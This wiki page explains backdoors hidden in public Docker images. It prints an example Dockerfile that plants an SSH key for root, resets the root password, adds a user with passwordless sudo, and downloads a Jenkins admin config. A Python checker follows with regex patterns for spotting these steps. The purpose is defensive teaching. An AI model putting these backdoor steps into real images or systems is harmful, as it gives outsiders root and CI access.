Docker - Common Security Issues Inside Public Docker Images

Here is a simple example. Doubtless a real-world case will be more misleading and harder to diagnose.

In lines 18-19 of the Dockerfile below, an SSH key is injected into authorized_keys. If you start sshd, you're in danger. In line 22, the root password has been reset. Not good, is it? In lines 25-26, a malicious OS user has been added. In lines 29-31, that user has been promoted to super admin and can run any command without a password! In lines 34-36, your Jenkins now has an unpleasant admin user. Yes, Jenkins is hot and popular. You can do a lot of things with Jenkins. So can the hackers! This case represents the security of the application layer. It's certainly the most dangerous and difficult case.

 ########## How To Use Docker Image ###############
 ##
 ##  Install docker utility
 ##  Download docker image:
 ##   docker pull denny/test:v1
 ##  Boot docker container:
 ##   docker run -t -P -d --name my-test denny/test:v1 /bin/bash
 ##
 ##  Build Image From Dockerfile.
 ##   docker build -f Dockerfile -t denny/test:v1 --rm=false .
 ##################################################
 
 FROM ubuntu:14.04
 MAINTAINER Denny <denny@dennyzhang.com>
 
 RUN mkdir -p /root/.ssh && \
   # SSH login by key file
   echo "ssh-rsa AAAAB3NzaC1...lOvno6KN5 denny@dennyzhang.com" \
        >> /root/.ssh/authorized_keys && \
 
   # Reset root password
   echo 'root:ChangeMe1' | chpasswd && \
 
   # Add a malicious user
   useradd denny && \
   echo 'denny:ChangeMe1' | chpasswd && \
 
   # Add user to super admin
   echo '%denny ALL=(ALL:ALL) NOPASSWD: ALL' > \
         /etc/sudoers.d/admins && \
   chmod 400 /etc/sudoers.d/admins && \
 
   # Add superadmin user to Jenkins
   mkdir -p /var/lib/jenkins/users/superadmin && \
   wget -O /var/lib/jenkins/users/superadmin/config.xml \
     https://github.com/DennyZhang/devops_public/raw/tag_v2/doc/admin_conf_xml
 
 CMD ["/bin/bash"]
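A defender reviewing a public image wants to catch exactly the five patterns above before the image is pulled or built. The following Python script is an added example and is not code from the original wiki page: it joins backslash continuations and drops comment and blank lines the way the Docker parser does (which is why the comments interleaved in the RUN chain above do not break it), then matches every `&&`-chained command in each RUN against a small, assumed list of indicators (authorized_keys writes, chpasswd, useradd, NOPASSWD sudoers entries, writes under /var/lib/jenkins/users/). Both Dockerfiles embedded in the script are constructed for the example; the sample mirrors the page's Dockerfile with the SSH key and download URL replaced by placeholders.

```python
"""Static review of a Dockerfile for the backdoor patterns discussed above.
Added example (not from the original page): it joins backslash continuations
and drops comment/blank lines like the Docker parser, then matches each
command in a RUN chain against defender-side indicators.  The indicator
list and both sample Dockerfiles are constructed here."""
import re

# Indicators a reviewer would flag in a public image's build: (name, regex).
# This list is an assumption for the example and is deliberately small.
INDICATORS = [
    ("ssh-key-injection", re.compile(r"authorized_keys")),
    ("password-reset", re.compile(r"\bchpasswd\b|\bpasswd\b")),
    ("user-added", re.compile(r"\buseradd\b|\badduser\b")),
    ("sudo-nopasswd", re.compile(r"NOPASSWD|/etc/sudoers")),
    ("jenkins-user-config", re.compile(r"/var/lib/jenkins/users/")),
]

# Constructed sample mirroring the page's Dockerfile; key and URL are placeholders.
SAMPLE_DOCKERFILE = r"""
FROM ubuntu:14.04

RUN mkdir -p /root/.ssh && \
  # SSH login by key file
  echo "ssh-rsa AAAA...PLACEHOLDER someone@example.invalid" \
       >> /root/.ssh/authorized_keys && \

  # Reset root password
  echo 'root:ChangeMe1' | chpasswd && \

  # Add a malicious user
  useradd denny && \
  echo 'denny:ChangeMe1' | chpasswd && \

  # Add user to super admin
  echo '%denny ALL=(ALL:ALL) NOPASSWD: ALL' > \
        /etc/sudoers.d/admins && \
  chmod 400 /etc/sudoers.d/admins && \

  # Add superadmin user to Jenkins
  mkdir -p /var/lib/jenkins/users/superadmin && \
  wget -O /var/lib/jenkins/users/superadmin/config.xml \
    https://example.invalid/admin_config.xml

CMD ["/bin/bash"]
"""

# Constructed control with none of the patterns.
CLEAN_DOCKERFILE = """
FROM ubuntu:14.04
RUN apt-get update && apt-get install -y curl
CMD ["/bin/bash"]
"""


def dockerfile_instructions(text):
    """Return (INSTRUCTION, arguments) pairs with continuations joined.
    Comment and blank lines are dropped before joining, which is why a
    comment between two '&& \\' lines does not break the RUN chain."""
    instructions, buf = [], []

    def flush():
        head, _, rest = " ".join(buf).partition(" ")
        instructions.append((head.upper(), rest.strip()))
        buf.clear()

    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.endswith("\\"):
            buf.append(line[:-1].rstrip())
            continue
        buf.append(line)
        flush()
    if buf:  # file ended with an open continuation
        flush()
    return instructions


def find_indicators(text):
    """Findings as dicts: indicator, 1-based instruction number, and the
    single '&&'-chained command that triggered it (naive split, not a
    shell parser; sufficient for the patterns above)."""
    findings = []
    for n, (instr, args) in enumerate(dockerfile_instructions(text), start=1):
        if instr != "RUN":
            continue
        for cmd in (c.strip() for c in args.split("&&") if c.strip()):
            for name, rx in INDICATORS:
                if rx.search(cmd):
                    findings.append({"indicator": name, "instruction": n, "command": cmd})
    return findings


def indicator_names(text):
    """Sorted, de-duplicated indicator names found in the Dockerfile text."""
    return sorted({f["indicator"] for f in find_indicators(text)})
```

Run against the sample, `indicator_names(SAMPLE_DOCKERFILE)` reports all five indicator classes the text walks through, every finding points at the single RUN instruction (number 3 after FROM and the skipped blank lines), and the clean control yields nothing. The same two functions can be pointed at a Dockerfile read from disk; for an image whose Dockerfile is not published, the equivalent check is to review the layer commands that `docker history` prints, which is where these RUN chains end up.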
docker/common_security_issues_inside_public_docker_images.1476710596.txt.gz · Last modified: 2020/07/15 09:30 (external edit)
